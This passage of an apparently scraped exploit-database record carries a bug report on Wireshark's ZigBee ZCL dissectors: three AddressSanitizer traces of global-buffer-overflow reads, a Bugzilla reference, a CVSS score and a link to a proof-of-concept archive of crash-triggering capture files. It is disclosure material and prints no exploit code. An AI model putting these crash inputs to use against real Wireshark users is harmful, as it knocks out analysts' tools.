wireshark/tshark.c:3728:5\r\n #33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11\r\n #34 0x515daf in main wireshark/tshark.c:2197:13\r\n \r\n0x7f8e33764094 is located 44 bytes to the left of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:3329:13' (0x7f8e337640c0) of size 64\r\n0x7f8e33764094 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_pwrprofiles' defined in 'packet-zbee-zcl-general.c:3328:13' (0x7f8e33764080) of size 20\r\nSUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:3847:21 in dissect_zcl_pwr_prof_pwrprofstatersp\r\nShadow bytes around the buggy address:\r\n 0x0ff2466e47c0: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9\r\n 0x0ff2466e47d0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00\r\n 0x0ff2466e47e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9\r\n 0x0ff2466e47f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ff2466e4800: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9\r\n=>0x0ff2466e4810: 00 00[04]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00\r\n 0x0ff2466e4820: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ff2466e4830: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9\r\n 0x0ff2466e4840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ff2466e4850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ff2466e4860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==7849==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11830. Attached are three files which trigger the crash.\r\n \r\nUpdate: there is also a similar crash due to out-of-bounds access to the global \"ett_zbee_zcl_pwr_prof_enphases\" array, see the report below.\r\n \r\nAttached is a file which triggers the crash.\r\n \r\n--- cut ---\r\n==8228==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f0d4f321100 at pc 0x7f0d45344cd5 bp 0x7fff69e4e4a0 sp 0x7fff69e4e498\r\nREAD of size 4 at 0x7f0d4f321100 thread T0\r\n #0 0x7f0d45344cd4 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:3685:25\r\n #1 0x7f0d4533bd04 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:3463:21\r\n #2 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #3 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #4 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #5 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #6 0x7f0d453308ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13\r\n #7 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #8 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #9 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #10 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #11 0x7f0d4530b750 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1680:9\r\n #12 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #13 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #14 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #15 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #16 0x7f0d4530aee1 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1033:13\r\n #17 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #18 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #19 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #20 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #21 0x7f0d45314897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9\r\n #22 0x7f0d4530e8aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9\r\n #23 0x7f0d4530fef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5\r\n #24 0x7f0d42d68417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7\r\n #25 0x7f0d43e2563b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17\r\n #26 0x7f0d43e1b40a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:594:5\r\n #27 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #28 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #29 0x7f0d42d5fdbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #30 0x7f0d43a6f5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #31 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #32 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #33 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #34 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #35 0x7f0d42d5b33b in dissect_record wireshark/epan/packet.c:501:3\r\n #36 0x7f0d42d093c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #37 0x5264eb in process_packet wireshark/tshark.c:3728:5\r\n #38 0x51f960 in load_cap_file wireshark/tshark.c:3484:11\r\n #39 0x515daf in main wireshark/tshark.c:2197:13\r\n \r\n0x7f0d4f321100 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:4460:13' (0x7f0d4f321120) of size 128\r\n0x7f0d4f321100 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:3329:13' (0x7f0d4f3210c0) of size 64\r\nSUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:3685:25 in dissect_zcl_pwr_prof_enphsschednotif\r\nShadow bytes around the buggy address:\r\n 0x0fe229e5c1d0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00\r\n 0x0fe229e5c1e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9\r\n 0x0fe229e5c1f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe229e5c200: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9\r\n 0x0fe229e5c210: 00 00 04 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00\r\n=>0x0fe229e5c220:[f9]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe229e5c230: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9\r\n 0x0fe229e5c240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe229e5c250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe229e5c260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe229e5c270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8228==ABORTING\r\n--- cut ---\r\n \r\nFurthermore, there is yet another similar condition in a somewhat related area of code, see the attached file and report below:\r\n \r\n--- cut ---\r\n==8856==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f148fad2900 at pc 0x7f1485afc15d bp 0x7ffd41dc3de0 sp 0x7ffd41dc3dd8\r\nREAD of size 4 at 0x7f148fad2900 thread T0\r\n #0 0x7f1485afc15c in dissect_zcl_appl_evtalt_get_alerts_rsp wireshark/epan/dissectors/packet-zbee-zcl-ha.c:889:21\r\n #1 0x7f1485afab0f in dissect_zbee_zcl_appl_evtalt wireshark/epan/dissectors/packet-zbee-zcl-ha.c:818:21\r\n #2 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #3 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #4 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #5 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #6 0x7f1485ae18ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13\r\n #7 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #8 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #9 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #10 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #11 0x7f1485abbe40 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1029:21\r\n #12 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #13 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #14 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #15 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #16 0x7f1485ac5897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9\r\n #17 0x7f1485abf8aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9\r\n #18 0x7f1485ac0ef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5\r\n #19 0x7f1483519417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7\r\n #20 0x7f14845d663b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17\r\n #21 0x7f14845cc35e in dissect_ieee802154 wireshark/epan/dissectors/packet-ieee802154.c:561:5\r\n #22 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #23 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #24 0x7f1483510dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #25 0x7f14842205f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #26 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #27 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #28 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #29 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #30 0x7f148350c33b in dissect_record wireshark/epan/packet.c:501:3\r\n #31 0x7f14834ba3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #32 0x5264eb in process_packet wireshark/tshark.c:3728:5\r\n #33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11\r\n #34 0x515daf in main wireshark/tshark.c:2197:13\r\n \r\n0x7f148fad2900 is located 32 bytes to the left of global variable 'ett' defined in 'packet-zbee-zcl-ha.c:1391:18' (0x7f148fad2920) of size 136\r\n0x7f148fad2900 is located 0 bytes to the right of global variable 'ett_zbee_zcl_appl_evtalt_alerts_struct' defined in 'packet-zbee-zcl-ha.c:698:13' (0x7f148fad28e0) of size 32\r\nSUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-ha.c:889:21 in dissect_zcl_appl_evtalt_get_alerts_rsp\r\nShadow bytes around the buggy address:\r\n 0x0fe311f524d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe311f524e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe311f524f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe311f52500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe311f52510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0fe311f52520:[f9]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe311f52530: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00\r\n 0x0fe311f52540: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00\r\n 0x0fe311f52550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe311f52560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0fe311f52570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8856==ABORTING\r\n--- cut ---\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38995.zip\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25715"}]}}
